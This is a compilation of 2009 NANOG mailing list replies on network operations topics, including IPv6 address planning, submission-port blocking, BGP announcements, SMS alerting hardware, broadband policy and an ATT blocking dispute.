Re: ISP port blocking practice
On Oct 22, 2009, at 6:14 PM, Lyndon Nerenberg (VE6BBM/VE7TFX) wrote: My experience is that port 587 isn't used because ISPs block it out-of-hand. Or in the case of Rogers in (at least) Vancouver, hijack it with a proxy that filters out the AUTH parts of the EHLO response, making the whole point of using the submission service ... pointless. We use 587 quite a lot (with SMTP Auth and SSL/TLS), and have found _very_ few places block or proxy it. We don't have any/many customers in Rogers service areas though. The biggest reason people don't use it is that it requires some thought and tweaking settings in the advanced tab areas of many email clients. Newer email clients are actually starting to look for submission port and SSL support and configuring it autmatically if they find it. Once it's set up correctly we've found customers really like it since their email just works in most places. --Chris
Re: ISP port blocking practice
On Oct 23, 2009, at 12:15 PM, Lyndon Nerenberg (VE6BBM/VE7TFX) wrote: As for outright blockage of port 587, I get this complaint from many of my clients while they are on the road. It seems hotels love to block it. I travel a bit (used to a lot) and only found one place that proxied it. Never saw an outright block. A call to the support group actually got if fixed in about 45 minutes. Call and complain if it's broken. You are the customer at that point. --Chris
Re: ISP/VPN's to China?
On Wed, 21 Oct 2009, Alex Balashov wrote: | I was not aware that tools or techniques to do this are widespread or highly | functional in a way that would get them adopted in an Internet access control | application of a national scope. Doesn't necessarily have to be hugely accurate. The authorities could simply identify a few likely suspect tunnels, then knock-on-doors and ask you to explain what the traffic in question is...
Re: IPv6 Deployment for the LAN
Once upon a time, Iljitsch van Beijnum iljit...@muada.com said: What we need is a thing that gives us what we need to connect to the network (addresses, DNS servers) and then a pointer in the form of an HTTP or HTTPS URL for all other configuration. You want to invent yet _another_ form of configuration management? -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: NetFlow analyzer software
Not sure if this will get you all the info you are looking for, but it's open source and works well for our needs. http://nfsen.sourceforge.net/ Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com Michael J McCafferty wrote: All, I am looking for decent netflow analyzer and reporting software with good support for AS data. ManagEngine's product crashes or locks up my browser when I try to list/sort the AS info because it's too large of a list and there is no way to tell it to show just the top x results. Plixer's Scrutenizer, while it seems like it's a pretty decent product, is no longer supporting Linux... We are a Linux shop (servers, desktops, laptops). What else is there that I might want to look at? Thanks! Mike M5Hosting.com Sent from my Verizon Wireless BlackBerry
Re: ISP customer assignments
Once upon a time, Michael Dillon wavetos...@googlemail.com said: And only the largest ISPs will outgrow a /32 allocation. This brings up something else I'm trying to figure out. We're not a huge ISP; I've got our /32 but I don't see us using more. We have two main POPs, each with Internet links, plus a link between the two. Our IPv4 allocations are larger than the minimum, so I split our IPv4 space between the two POPs and avertise a smaller block out of the smaller of the two POPs. This has worked okay and handles the POP-to-POP link going down; when that happens, our POP-to-POP traffic (not a large precentage of our traffic) goes across our Internet connections, but Internet traffic for each POP goes to directly to the POP. With IPv6, we've got our single /32. From what I understand, if I try to advertise a /33 from the smaller POP, many (most?) will drop it (if my upstreams even take it). If I advertise the /32 from both routers, when that link goes down, my IPv6 traffic will be pretty much hosed. Is there any good solution to this? I don't expect us to fill the /32 to justify expanding it (although I do see ARIN appears to have left space for up to a /29; I guess that's their sparse allocation policy?). I guess this is traffic engineering, although I'm not deaggregating to try to control how much goes where, just to ensure connectivity in the face of failures. This link has been pretty reliable lately (since the telco re-engineered it), but it was flakey as hell a while back (when it went through 7 companies to go between cities 90 miles apart). -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: ISP customer assignments
On 13/10/09 15:33, Justin Shore wrote: He didn't really give much of a reason for the /127s yet. I think it's coming up in a later session. I think it basically boiled down to whether or not the customer would actually use anything bigger. I'll write back when we get into that discussion. Anything other than /64 removes the possibility of using privacy (aka temporary) addresses, enabled on Vista and above by default (net.ipv6.conf.all.use_tempaddr on Linux). For a single prefix a host may have by default up to 8 global unicast addresses - 1 EUI-64 and 7 privacy.
Re: IPv6 in the ARIN region
We are running IPv6 over 209 currently. 2607:F8E8::/32 Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com David Temkin wrote: I contacted 209 yesterday (due to the ongoing Cogent/174 silliness) and it seems like they are willing to turn up customer-facing v6, but have made it a sales process (versus a technical request) and so that complicates things. -Dave On Tue, Oct 13, 2009 at 8:27 AM, Seth Mattinen se...@rollernet.us wrote: New thread: who will route the full IPv6 table? So far I'm seeing PI /48's out of 2620:0:/23 from: NTT, 2914 ATT, 7018 Sprint, 1239 and 6175 Hurricane, 6939 Level 3, 3356 Global Crossing, 3549 Qwest, 209 Did I miss anyone? Qwest only carries one route (out of 4 total) though, don't know if that's an exception or they only have one ARIN PI customer. ~Seth
Re: IPv6 in the ARIN region
David Temkin wrote: I contacted 209 yesterday (due to the ongoing Cogent/174 silliness) and it seems like they are willing to turn up customer-facing v6, but have made it a sales process (versus a technical request) and so that complicates things. -Dave On Tue, Oct 13, 2009 at 8:27 AM, Seth Mattinen se...@rollernet.us wrote: New thread: who will route the full IPv6 table? So far I'm seeing PI /48's out of 2620:0:/23 from: NTT, 2914 ATT, 7018 Sprint, 1239 and 6175 Hurricane, 6939 Level 3, 3356 Global Crossing, 3549 Qwest, 209 Did I miss anyone? Qwest only carries one route (out of 4 total) though, don't know if that's an exception or they only have one ARIN PI customer. ~Seth Qwest still considers this a beta service. They're routing our /32, but we're still preferring our other peerings. Not to point fingers, but Force10 is advertising a /64 that HE (and subsequently Qwest others) are accepting. I'd suspect they'll accept most anything. 2620:0:380::/48 x:x:x::x 1537 209 6939 18508 I 2620:0:380:2::/64 x:x:x::x 1537 209 6939 18508 393222 I -- Chris
Re: ISP customer assignments
Once upon a time, Michael Dillon wavetos...@googlemail.com said: How many addresses do you like on point-to-point circuits? That will become one of those great interview questions, because anyone who says something like a /127 or a /64 will be someone that you probably don't want to hire. The right answer is to explain that there are some issues surrounding the choice of addressing on point-to-point circuits and there has even been an RFC published discussing these issues, RFC 3627 http://www.ietf.org/rfc/rfc3627.txt Still learning here, so please go easy... I read the above, and I see section 4 item 3 says: The author feels that if /64 cannot be used, /112, reserving the last 16 bits for node identifiers, has probably the least amount of drawbacks (also see section 3). I guess I'm missing something; what in section 3 is this referring to? I can understand /64 or /126 (or maybe /124 if you were going to delegate reverse DNS?), but why /112 and 16 bits for node identifiers on a point-to-point link? -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: ISP customer assignments
Once upon a time, Leo Bicknell bickn...@ufp.org said: 2) Colon's separate 16 bit chunks in IPv6. /112's allow ::1, ::2 to be your IP's. Yeah, this is what I forgot about. Makes sense now. Another (quite possibly dumb :-) ) few questions come to mind about IPv6 assignment: I would expect you just assign static addresses to servers. Are there pros/cons to using /64 or something else there? If I'm statically assigning IP (and DNS, etc. servers) info, why would I not just configure the gateway there as well (especially if you just make all local router interfaces ::1)? What about web-hosting type servers? Right now, I've got a group of servers in a common IPv4 subnet (maybe a /26), with a /24 or two routed to each server for hosted sites. What is the IPv6 equivalent? I can see a /64 for the common subnet, but what to route for aliased IPs for web hosts? It is kind of academic right now, since our hosting control panel software doesn't handle IPv6, but I certainly won't be putting 2^64 sites on a single server. Use a /112 here again as well? Use a /64 per server because I can? What about anycast-type addresses (e.g. DNS servers)? I route a few server IPv4 /32s around in my network; do you assign a /128, a /64 (with only one address in use), a /112, or something else? -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: ISP customer assignments
Once upon a time, Nathan Ward na...@daork.net said: On 14/10/2009, at 2:14 PM, Chris Adams wrote: What about web-hosting type servers? Right now, I've got a group of servers in a common IPv4 subnet (maybe a /26), with a /24 or two routed to each server for hosted sites. What is the IPv6 equivalent? I can see a /64 for the common subnet, but what to route for aliased IPs for web hosts? It is kind of academic right now, since our hosting control panel software doesn't handle IPv6, but I certainly won't be putting 2^64 sites on a single server. Use a /112 here again as well? Use a /64 per server because I can? Why route them to the servers? I would just put up a /64 for the web servers and bind addresses to your ethernet interface out of that /64 as they are used by each site. I guess you might want to route them to the servers to save ND entries or something on your router? In the past, we saw issues with thousands of ARP entries (it has been a while and I don't remember what issues now though). Moving a block from one server to another didn't require clearing an ARP cache (and triggering a couple of thousand new ARP requests). Also, it is an extra layer of misconfiguration-protection: if the IPs are routed, accidentally assigning the wrong IP on the wrong server didn't actually break any existing sites (and yes, that is a lesson from experience). Of course, with IPv4, you never assigned a large enough block to begin with that would anticipate all growth, so routing additional blocks was a lot easier than changing blocks, cleaner than secondary IPs multiplying like crazy, etc., etc. None of that would be an issue with a single /64. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: ISP customer assignments
On Oct 5, 2009, at 1:43 PM, Wayne E. Bouchard wrote: Whenever you declare something to be inexhasutable all you do is increase demand. Eventually you reach a point where you realize that there is, in fact, a limit to the inexhaustable resource. This is where I think there is a major disconnect on IPv6. The size of the pool is just so large that people just can't wrap their heads around it. 2^128 is enough space for every man, woman and child on the planet to have around 4 billion /64s to themselves. Even if we assume everyone might possibly need say 10 /64s per person that still means we are covered until the population hits around 2,600,000,000,000,000,000. Chris - Chris Owen - Garden City (620) 275-1900 - Lottery (noun): President - Wichita (316) 858-3000 -A stupidity tax Hubris Communications Inc www.hubris.net -
Re: OT: iPhone Problems
MMS or quaility control: pick one! :) On 10/4/09, Clue Store cluest...@gmail.com wrote: Mine's rebooted at leat 3 times a day sine the upgrade :( What ever happened to quality control http://discussions.apple.com/thread.jspa?threadID=2152619tstart=0 -- Sent from my mobile device
Gmail Down?
Anyone else seeing Google's Gmail down right now? Seems to have been down since 10am CST. We are connected through Chicago. downforeveryoneorjustme.com is also reporting it's down. -- Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com
Re: Gmail Down?
It was short-lived, seems to be back up now, but a little flaky. Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com Chris Gotstein wrote: Anyone else seeing Google's Gmail down right now? Seems to have been down since 10am CST. We are connected through Chicago. downforeveryoneorjustme.com is also reporting it's down.
Re: Gmail Down?
We don't use gmail for any of our services, but a lot of our ISP customers use gmail. So when they see gmail being down, they assume that their internet connection is down or that we are the reason that gmail is not working. Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com Harald Koch wrote: It does appear that gmail going down leads to a DoS against the NANOG list. :-)
Re: SMS
Once upon a time, Alex Balashov abalas...@evaristesys.com said: Shane Ronan wrote: On that same note, can someone point me in the direction of an SMS gateway service? I would like to be able to send SMS messages from my monitoring systems, but I am unsure about how to go about it. Why not use an e-mail to SMS gateway from whichever carrier? They tend to be unreliable (long delays and dropped messages). Also, how can your monitoring system email the gateway when the network is down? -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: SMS
Once upon a time, William Herrin herrin-na...@dirtside.com said: The Multitech Multimodem GPRS model MTCBA-G-EN-F4 has an ethernet port. Add a SIM card from your favorite wireless carrier and you can send and receive SMS messages via AT commands over a TCP socket. Problem is, it seizes up or otherwise founders every few weeks and has to be power cycled. Has anyone heard of other products with a good reliability record? We have the MTCBA-G-U-F4-ED (the USB version) and have not had any trouble. I had to modify the Linux kernel driver for the chipset used to load the firmware correctly (and optionally externally instead of just compiled in), but those changes are in the upstream kernel now. We haven't had any problem with it locking up or anything; the server with it attached has been up for a year (as of 41 minutes ago :-) ) with no problems (haven't had to pull the modem or anything like that). We have an ATT SIM card in it, and we did have problems with ATT's SMS several months ago; for several hours, they were rejecting messages from our modem. Now I have an additional monitor that sends a message to itself periodically, and (of course) we haven't had that problem since. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Hijacked Blocks
Christopher Morrow wrote: The end of the discussion was along the lines of: Yes, we know this guy is bad news, but he always comes to us with the proper paperwork and numbers, there's nothing in the current policy set to deny him address resources. Happily though he never pays his bill after the first 12 months so we just reclaim whatever resources are allocated then. (yes, comments about more address space ending up on BL's were made, and that he probably doesn't pay because after the first 3 months the address space is 'worthless' to him...) How should this get fixed? Is it possible to make policy to address this sort of problem? -chris If this is the case one could argue that ARIN should be reserving this worthless address space to be used when they receive similar requests in the future. There's no reason personX should get fresh, clean address space when they make additional requests. Regards, Chris
Re: Repeated Blacklisting / IP reputation
On 08/09/09 21:34, Joe Greco wrote: Show me ONE major MTA which allows you to configure an expiration for an ACL entry. This is fairly trivial to do with Exim by storing your acl entries in a database or directory with a field/attribute for expiry, and an appropriate router configuration. No doubt you could implement this using a small script for any MTA. The upside of using a db/ldap backend is that it makes it easy to inter-operate with other things like your nms.
Re: Telstra issues
On 03/09/09 07:47, Mark Newton wrote: We run one which isn't connected to Telstra :-) There are media reports this morning of major outages in Telstra's domestic network. http://www.australianit.news.com.au/story/0,24897,26021106-15306,00.html Thank goodness PPC-1 is nearing completion, eh? http://www.pipeinternational.com/index.php?option=com_myblogItemid=65
Re: Ready to get your federal computer license?
On Sun, Aug 30, 2009 at 20:28, Steven M. Bellovins...@cs.columbia.edu wrote: On Sun, 30 Aug 2009 22:20:55 -0400 Eric Brunner-Williams brun...@nic-naa.net wrote: randy, moveon is a maine-based org. it is an effective, fund raising, partisan organization. it is much more than a click-and-opine vehicle, it puts hundreds of thousands of dollars into competitive races, and has a competent political director. to create a NagOn we would have to hire or appoint a political director, and a financial director, and charge each with framing the issue, and executing a seven figure plan, and a communications director, to put the message with the money in targeted media markets, and finally, to show teeth, drop the margin of error, or on the order of high five, low six figures, in targeted congressional races, for challengers and incumbants. in about a year after starting down this path, the Congressman, its NagOn on line one conversation would be slightly different from today, and in several years time, more so. A journey of a thousand miles begins with a single step. I don't know that a NagOn is the best way or the only way to make progress. I do know that the most likely source of that kind of funding is (many of) our employers, who may not have technical excellence on the top of their lists. But I'm even more certain that if technical people never speak up, their message will never be heard, except perhaps by accident. --Steve Bellovin, http://www.cs.columbia.edu/~smb I believe that this is exactly the kind of thing that the US ISOC Chapters should be (and are to varying degrees) involved in -- providing legitimate technical information and expert analysis of local, state and federal policies which impact the Internet, to those making the policies. The global ISOC already does this for ICANN and other international organizations, it seems fitting that the chapters do more of this here inside the USA. I encourage everyone with even a fleeting interest in tech-policy to seek out their local ISOC chapter (http://www.isoc.org/isoc/chapters/list.php?region=worldwidestatus=A) and let them know that you care. I can tell you as the founding chair of the Colorado chapter that my largest hurdle today is getting active members to participate - I have funding, etc, just no help... (I invite everyone to contact me directly with suggestions and ideas in this vein - I have some vehicles in place to start making this happen quickly with a bit of help) /soapbox ~Chris -- Chris Grundemann weblog.chrisgrundemann.com www.burningwiththebush.com www.coisoc.org
Re: Ready to get your federal computer license?
On Sat, Aug 29, 2009 at 06:57, Scott Morriss...@emanon.com wrote: I must have missed the phrasing that says nobody else can make an independent decision regarding any security measure above and beyond the minimum standards... I'll go back and look for that. Scott Florian Weimer wrote: * Scott Morris: I'm trying really hard to find my paranoia hat, and just to relieve some boredom I read the entire bill to try to figure out where this was all coming from (2) may declare a cybersecurity emergency and order the limitation or shutdown of Internet traffic to and from any compromised Federal Government or United States critical infrastructure information system or network; Wouldn't this mean you're allowed to set emergency ACLs only if a cybersecurity emergency has been declared by the President? The EFF summed up the problems with the bill's current text quite well I believe (without any tin-foil hats required): The Cybersecurity Act is an example of the kind of dramatic proposal that doesn't address the real problems of security, and can actually make matters worse by weakening existing privacy safeguards – as opposed to simpler, practical measures that create real security by encouraging better computer hygiene. - http://www.eff.org/deeplinks/2009/04/cybersecurity-act $0.02 ~Chris -- Chris Grundemann weblog.chrisgrundemann.com www.burningwiththebush.com www.coisoc.org
Re: FCCs RFC for the Definition of Broadband
Once upon a time, Daniel Senie d...@senie.com said: Before you get too hung up on the emergency phone thing, take a hard look at the present day. The telcos pushed SLC gear out everywhere. Those have batteries, but at least in some areas, no maintenance was done, batteries died, and when the power went out, so did the phones. The SLCs had generator plug-in setups to be used in an emergency, but in any natural disaster, it's unlikely there'd be enough portables deployed and maintained by the telco to keep the multiplexors alive. Around here, most BellSouth cabinets have a natural gas generator as part of the setup, so they stay up as long as the gas lines are good (and if something has happened to both the power lines and the gas service, it probably doesn't matter much anyway). We had a fairly large power outage here a few months ago that affected just about everybody except for my house and my sister's house (we're only a mile or so apart). Neither of us even knew the power was out until we left our houses. Her Comcast cable was out (my Knology wasn't), so she decided to go to the store (I just happened to also go out at the same time). Sticking with BellSouth/ATT for phone service (and DSL for Internet) wasn't such a bad idea after all. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: FCCs RFC for the Definition of Broadband
Once upon a time, Peter Beckman beck...@angryox.com said: And where does that fiber go to? Home runs from a central point in the development, so any provider can hook up to any house at the street? Deregulation means those lines should be accessible to any company for a fee. How do you give House A Verizon and House B Cox, especially if Cox doesn't support fiber? I have two cable TV providers available at my house. They each have their own cable plant in my neighborhood; there are two runs in each easment, two sets of pylons for access (although they mostly alternate yards, so they aren't digging at the same place when burying new wires). If you switch from one to the other, the new one runs a new wire from their nearest tap and sends somebody else around in a few weeks to bury (under maybe 2 of dirt) the wire. On my block, the cable lines are at the back edge of the yard, running between the houses (down the middle of the block), while the phone company wires run along the easment at the front edge of the yard with the utility (power/water/sewer) lines. Not sure why it was done that way, except maybe to keep the cable guys from digging up important stuff on a regular basis (since people switch cable a lot). However, I've seen pictures of the old power lines in New York City and such, when there were a dozen or more power companies. I sure wouldn't want to see anything like that again. IMHO, we'd be better off with a public utility that manages nothing but the cable plant, running one set of wires (a few copper pairs, a coax or two, and a couple of fiber pairs) to each house, and then selling equal access to all takers (ILEC, CLEC, cable TV, direct to ISPs, etc.). The utility would be banned from selling any kind of service themselves, and would be a non-profit; they'd charge everybody the same fees for access to the same type of cable and they'd maintain the plant and colo facilities. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Qwest IPv6
Qwest is still beta testing IPv6. We turned ours up last week and were one of the first to do so. I can go through my notes and email you the contact info of the people that are working on that. Kevin Brown wrote: Does anyone have a contact at Qwest who can help us get the ball rolling to implement an exchange of IPv6 traffic? Their NOC referred us back to our account manager, who said We don't do IPv6. A quick Google search would seem to indicate otherwise... Thanks! -- Chris Gotstein Sr Network Engineer UP Logon/Computer Connection UP 500 N Stephenson Ave Iron Mountain, MI 49801 Phone: 906-774-4847 Fax: 906-774-0335 ch...@uplogon.com
Re: Qwest IPv6
Once upon a time, Kevin Brown ke...@qis.net said: Does anyone have a contact at Qwest who can help us get the ball rolling to implement an exchange of IPv6 traffic? Their NOC referred us back to our account manager, who said We don't do IPv6. A quick Google search would seem to indicate otherwise... When I asked a few months ago, the NOC gave me the we don't do IPv6 answer. Looking at BGP, I only see AS 209 behind HE (with 1 prefix and 2 transit prefixes), so I would guess that's still basically the case. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: FCCs RFC for the Definition of Broadband
Once upon a time, Leo Bicknell bickn...@ufp.org said: When the original rural telephone network was pushed ROI's of 50 years were talked about. There's plenty of infrastructure built every day with ROI's of 20 years. How much of that was built in the last 15 years though (where now it needs to be replaced before it has been paid for)? In the 1990s, BellSouth pushed hard here, rolled out fiber to the neighborhoods, and deployed ISDN-capable equipment everywhere. ISDN was available at every single address in town by around 1995 (allegedly we were one of if not the first moderate-sized city with ISDN everywhere). Then it turned out ISDN was a flop, and DSL came along, which wouldn't run over that nice big fiber plant. They had to start rolling out remote DSLAMs all over town. Shortly after they had most of the city covered, ADSL2 came along, and they had to start upgrading again. Granted, the cable plant (whether copper, fiber, coax, or avian datagram) is not quite the same, but the bean-counters look at it as we were supposed to have bignum-year ROI on project 1, 2, and 3, and we didn't get it; why should I believe we'll get it on project 4?. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: FCCs RFC for the Definition of Broadband
Once upon a time, jim deleskie deles...@gmail.com said: Why should I person be disadvantage from another in the same country, maybe its the Canadian in me, but isn't there something in the founding documents of the US that define's all men as being equal. Nobody is forcing anybody to live out where high-speed Internet is not currently feasible (or at least not at a price that those residents want to pay). I live half a mile from a six lane highway; that doesn't mean that we have to build six lane highways to within half a mile of everybody in the country. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
RE: F5/Cisco catalyst configuration question
That is what I was thinking when I first read your email. I would agree with Darren. CL -Original Message- From: Dylan Ebner [mailto:dylan.eb...@crlmed.com] Sent: Thursday, August 20, 2009 10:36 AM To: Scott Spencer; 'Darren Bolding'; 'Christopher Greves' Cc: nanog@nanog.org Subject: RE: F5/Cisco catalyst configuration question This couldn't be something as simple as a crossover cable, could it? -Original Message- From: Scott Spencer [mailto:sc...@dwc-computer.com] Sent: Thursday, August 20, 2009 11:24 AM To: 'Darren Bolding'; 'Christopher Greves' Cc: nanog@nanog.org Subject: RE: F5/Cisco catalyst configuration question Darren, It's the F5-BIG-LTM-6400, pair of them. Thanks for your info. Got alot of good, helpful responses. Best regards, Scott Spencer Data Center Asset Recovery/Remarketing Manager Duane Whitlow Co. Inc. Nationwide Toll Free: 800.977.7473. Direct: 972.865.1395 Fax: 972.931.3340 mailto:sc...@dwc-computer.com sc...@dwc-computer.com http://www.dwc-it.com/ www.dwc-it.com Cisco/Juniper/F5/Foundry/Brocade/Sun/IBM/Dell/Liebert and more ~ _ From: packetmon...@gmail.com [mailto:packetmon...@gmail.com] On Behalf Of Darren Bolding Sent: Wednesday, August 19, 2009 6:58 PM To: Christopher Greves Cc: Scott Spencer; nanog@nanog.org Subject: Re: F5/Cisco catalyst configuration question What model BIG-IP? On some models I have had to set the BIG-IP's or the 6500 (can't remember which) to specified speed/duplex and the other side to auto. I believe it was auto on the BIG-IP and fixed on the 6500. Setting both sides the same did not work. On Wed, Aug 19, 2009 at 10:41 AM, Christopher Greves christopher.gre...@mindspark.com wrote: Scott, We've had issues in the past with IOS 6500's auto-negotiating uplink ports with an LTM into ISL Trunk mode. This only occurred when we had the port on the LTM configured as a tagged interface. It was easily solved by forcing the port on the 6500 into dot1q encapsulation. I'm not sure this necessarily explains why you aren't seeing a link light on the LTM though. I can't remember what the interface status was on both sides. This does correlate to why it's working on the 2950's as they don't support ISL and would likely negotiate into dot1q. Chris Christopher Greves | Senior Systems Engineer One North Lexington Ave, 9th Floor - White Plains, NY 10601 T 914-826-2067 | C 914.420.8340 | E christopher.gre...@mindspark.com Mindspark Interactive Network, Inc. is an IAC company. -Original Message- From: Scott Spencer [mailto:sc...@dwc-computer.com] Sent: Wednesday, August 19, 2009 1:13 PM To: nanog@nanog.org Subject: F5/Cisco catalyst configuration question Trying to link an F5 Local Traffic Manager with a Cisco Catalyst 6500 , have matched ports (speed,duplex ect..) but no link light at all on the F5. Does link with a Cisco 2950 switch in between but I need a direct connection with the 6500. Any suggestions what to try? Best regards, Scott Spencer Data Center Asset Recovery/Remarketing Manager Duane Whitlow Co. Inc. Nationwide Toll Free: 800.977.7473. Direct: 972.865.1395 Fax: 972.931.3340 mailto:sc...@dwc-computer.com sc...@dwc-computer.com http://www.dwc-it.com/ www.dwc-it.com Cisco/Juniper/F5/Foundry/Brocade/Sun/IBM/Dell/Liebert and more ~ -- -- Darren Bolding -- -- dar...@bolding.org --
IPv6 Addressing Help
We are a small ISP that is in the process of setting up IPv6 on our network. We already have the ARIN allocation and i have a couple routers and servers running dual stack. Wondering if someone out there would be willing to give me a few pointers on setting up my addressing scheme? I've been mulling over how to do it, and i think i'm making it more complicated than it needs to be. You can hit me offlist if you wish to help. Thanks. -- Chris Gotstein Sr Network Engineer UP Logon/Computer Connection UP 500 N Stephenson Ave Iron Mountain, MI 49801 Phone: 906-774-4847 Fax: 906-774-0335 ch...@uplogon.com
Re: IPv6 Addressing Help
I think we had to let ARIN know the time frame of deploying IPv6 and how many customers we expected to put on in the first couple years. They did not ask for an addressing scheme. Reading over the RFC's and other IPv6 resources, we have decided to hand out /56's to small/home/SOHO customers and /48's to larger customers. I'm just not able to wrap my brain around the subnetting that needs to be done on the router. Like i said before, i think i'm just over complicating it in my mind. Chris Gotstein Sr Network Engineer UP Logon/Computer Connection UP 500 N Stephenson Ave Iron Mountain, MI 49801 Phone: 906-774-4847 Fax: 906-774-0335 ch...@uplogon.com Thomas Mangin wrote: I do not know about arin but ripe changed it's policy so you only have to say pretty please to receive your allocation. It better that way anyway. Thomas Mangin On 14 Aug 2009, at 16:17, Jeroen Massar jer...@unfix.org wrote: Chris Gotstein wrote: We are a small ISP that is in the process of setting up IPv6 on our network. We already have the ARIN allocation and i have a couple routers and servers running dual stack. Wondering if someone out there would be willing to give me a few pointers on setting up my addressing scheme? Strange, I recall that you had to submit one when requesting address space from ARIN. Why don't you use that one? I've been mulling over how to do it, and i think i'm making it more complicated than it needs to be. You can hit me offlist if you wish to help. Thanks. It all depends on your network and how you want to set it up, but for the sake of internal aggregation: * Determine the expected amount of IPv6 customers at a certain location for the next X years, making X 2 (though 10 is probably a better idea, just in case, if don't want to do it again ;) ) * Take that number round it up to a power of 2 * Every customer gets a /48, you know the number, which is a power of 2, thus root it, and you know how many bits you need at that site eg expect 200 customers, round to power of 2 thus 256, which is 2^8, thus you will need a /48 + 8 bits = /40 at that location. You now know how much address space you need at that location for the next X years. Repeat that for all your locations / routing areas, basically the PoPs or termination points of your customers; or if you are really big do that per city/town/suburb. Keep enough space (the rounding helps there quite a bit, especially with numbers like 50k customers ;) Now you have an overview of what you expect to be allocating at each and every site. To add a little growth/future proof and to make live easy, you could either opt at this stage to round everything off to 'nice' numbers, eg only use /40's or /36's per PoP. Thus making everything the same, or doing things like grouping smaller PoPs together. Then when you have done that, take those blocks, and try to squeeze them a bit together. You should now have arrived to the address plan that you originally submitted to ARIN. Fill those blocks into a nice database, roll a PHP/shell/perl/whatever script to spit out your router configuration and presto: you are done. Enjoy the weekend ;) Greets, Jeroen
Re: Dan Kaminsky
Once upon a time, Phil Regnauld regna...@catpipe.net said: Jorge Amodio (jmamodio) writes: It may sound too futuristic and inspired from science fiction, but I never saw Captain Piccard typing a URL on the Enterprise. That's ok, I've never seen the Enterprise at the airport. I have, but not that Enterprise (I saw the space shuttle orbiter Enterprise on a 747 land here). Let's see how far the SMTP replacement has come, and get some inspiration. Heck, it's an application that only _uses_ the DNS, should be easy. There's always somebody looking to re-invent the wheel, but usually they are startups looking to make a quick buck by patenting and licensing their technology that will be the savior of the Internet (and so they don't get far). -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Dan Kaminsky
Once upon a time, Ben Scott mailvor...@gmail.com said: In the the vast majority of cases I have seen, people don't type domain names, they search the web. When they do type a domain name, they usually type it into the Google search box. Web != Internet. DNS is used for much more than web sites, and many of those things are not in a public index. For example, most people type in their friends' email addresses (at least into an address book). -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: cisco.com
Seeing same issue from Chicago via Qwest and HE. Both work from Austin, TX. - d. On Tue, 4 Aug 2009, Alex Nderitu wrote: Facebook seems to also be affected. -Original Message- From: R. Benjamin Kessler r...@mnsginc.com To: nanog@nanog.org Subject: cisco.com Date: Tue, 4 Aug 2009 09:34:46 -0400 Hey Gang - I'm unable to get to cisco.com from multiple places on the 'net (including downforeveryoneorjustme.com); any ideas on the cause and ETR? Thanks, Ben -- Dominic J. Eidson Baruk Khazad! Khazad ai-menu! - Gimli http://www.dominiceidson.com/ -- Chris Gotstein Sr Network Engineer UP Logon/Computer Connection UP 500 N Stephenson Ave Iron Mountain, MI 49801 Phone: 906-774-4847 Fax: 906-774-0335 ch...@uplogon.com
Re: OT: Voice Operators' Group forming
On 29.07.2009, at 22:52, Jason LeBlanc wrote: Brandon Butterworth wrote: NAVOG works for me. I'd prefer Voice Operators' Group Online Network brandon *claps* Imagine the poetry you have to listen to when _those_ guys put you on hold...
Re: ATT. Layer 6-8 needed.
Apparently not Back to the kids' table ! On Mon, Jul 27, 2009 at 12:38 AM, William Pitcock neno...@systeminplace.net wrote: On Sun, 2009-07-26 at 20:05 -0700, Shon Elliott wrote: There has been alot of customers on our network who were complaining about ACK scan reports coming from 207.126.64.181. We had no choice but to block that single IP until the attacks let up. ...have you ever heard of forged packet headers? Just saying. William -- William Pitcock SystemInPlace - Simple Hosting Solutions 1-800-688-5018
Re: ATT. Layer 6-8 needed.
This only protects ISPs from, upon being served notice, being liable for content A majority of the CDA was overturned, as it violates both first and fifth amendments. What is left of it only applies to ISPs PUBLISHING (*not* filtering) content This is Net Neutrality realm On Mon, Jul 27, 2009 at 1:25 AM, Andrew D Kirch trel...@trelane.net wrote: William Pitcock wrote: On Sun, 2009-07-26 at 23:15 -0700, Shon Elliott wrote: Okay, so how do YOU block the attacks from eating up your bandwidth and filling up your logs without blocking the entire IP? If I was ATT, I would purchase DDoS filtering equipment and run it at edge where all of my traffic is peering anyway. This discussion is about ATT, not you. William While I agree, I certainly believe that due to the nature of some of the content on 4chan, ATT can make a strong Good Samaritan claim under 47USC230. There's always TOR. Andrew D Kirch
